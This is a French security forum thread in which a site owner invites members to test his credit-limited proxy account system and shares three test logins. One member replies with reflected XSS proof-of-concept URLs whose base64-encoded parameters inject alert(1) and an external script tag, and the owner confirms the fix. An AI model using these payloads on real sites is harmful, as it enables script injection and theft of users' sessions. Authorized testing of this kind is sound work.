S'enregistrer | Rechercher | FAQ | Liste des Membres | Groupes d'utilisateurs | Connexion

  Nom d'utilisateur:    Mot de passe:       

  

Poster un nouveau sujet   Répondre au sujet Page 1 sur 1
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
MessagePosté le: Mer Déc 29, 2010 10:34 pm    Sujet du message: Test de mon site Répondre en citant

ON-LE-CHAT
Projets


 
Inscrit le: 29 Déc 2010
Messages: 2



Bonjour,

J'ai codé récemment tout un système de compte où les connexions sont régulées par un horaire et un crédit : une connexion : -1 crédit, à zéro il est impossible d'utiliser le service, en l’occurrence un proxy.

Adresse du site : Retirée
Autorisation : Retirée

Pour le mettre Ă  l'Ă©preuve voici 3 comptes :
    hackbbs / sbbkcah : compte tel qu'on l'obtient à l'inscription, sans crédit, avec restriction d'horaire.
    hackbbs_demi / sbbkcah : compte au crédit illimité, mais à restriction d'horaire.
    hackbbs_full / sbbkcah : compte au crédit illimité, sans restriction d'horaire.

Le site ne se trouve que dans le dossier "/proxlis" et ses sous-dossiers, inutile d'aller chercher Ă  la racine Wink

Merci de votre aide Very Happy


Dernière édition par ON-LE-CHAT le Mer Juin 29, 2011 11:41 am; édité 2 fois
Voir le profil de l'utilisateur Envoyer un message privés
MessagePosté le: Jeu Déc 30, 2010 3:10 am    Sujet du message: Répondre en citant

5N4K37
Projets


 
Inscrit le: 11 Mai 2010
Messages: 276
Localisation: Where connected=1



Bonjour,
Après avoir cherché une trentaine de secondes, voilà:


Grosse faille XSS ici:
http://xxxxxx.com/proxlis/index.php?e=invalid_url&return=http%3A%2F%2xxxxxxxxt.com%2Fproxlis%2Fbrowse.php%3Fu%3DOi8vZ29vZ2xlLmNvbV08c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg%253D%253D%26b%3D29%26f%3Dnorefer&p=YToxOntpOjA7czo0NDoiaHR0cDovL2dvb2dsZS5jb21dPHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4iO30=
qui alert (1)
ou ici
http://xxxxxxxx.com/proxlis/index.php?e=invalid_url&return=http%3A%2F%2xxxxxxxxt.com%2Fproxlis%2Fbrowse.php%3Fu%3DOi8vXSA8c2NyaXB0IHNyYz1lZGVkLmpzPjwvc2NyaXB0Pg%253D%253D%26b%3D29%26f%3Dnorefer&p=YToxOntpOjA7czozODoiaHR0cDovL10gPHNjcmlwdCBzcmM9ZWRlZC5qcz48L3NjcmlwdD4iO30=
qui laisse l'importation du script identique dans les sources:
<div id="error">L'URL demandée n'a pas été reconnue comme une URL valide. Tentative de calcul : http://] <script src=eded.js></script></div><p style="text-align:right">[<a href="http://xxxxxxxxx.com/proxlis/browse.php?u=Oi8vXSA8c2NyaXB0IHNyYz1lZGVkLmpzPjwvc2NyaXB0Pg%3D%3D&amp;b=29&amp;f=norefer">Recharger http://] &lt;script src=eded.js&gt;&lt;/script&gt;</a>]</p>


[EDIT]: http://xxxxxxxxt.com/proxlis/includes/process.php?action=cookies cette page n'affiche rien. Est-ce que les cookies sont bien supprimés? EUh d'ailleurs, toutes les modifications de config ont cet effet. C'est normal pour le moment?
Cordialement, 5N4K37.
Ps: je regarderai le reste plus tard. Wink


Dernière édition par 5N4K37 le Ven Juil 08, 2011 2:19 pm; édité 1 fois
Voir le profil de l'utilisateur Envoyer un message privés Envoyer un e-mail Messagerie InstantanĂ©e
MessagePosté le: Jeu Déc 30, 2010 11:36 am    Sujet du message: Répondre en citant

ON-LE-CHAT
Projets


 
Inscrit le: 29 Déc 2010
Messages: 2



Merci beaucoup Very Happy
La faille XSS est comblée, la page "process.php" fonctionne désormais correctement.
Les cookies n'étaient pas supprimés, et non ce n'était pas normal Wink

Le Chat LĂ©on
Voir le profil de l'utilisateur Envoyer un message privés
Poster un nouveau sujet   Répondre au sujet Page 1 sur 1

  


 
Sauter vers:  
Vous ne pouvez pas poster de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum



114205 Attacks blocked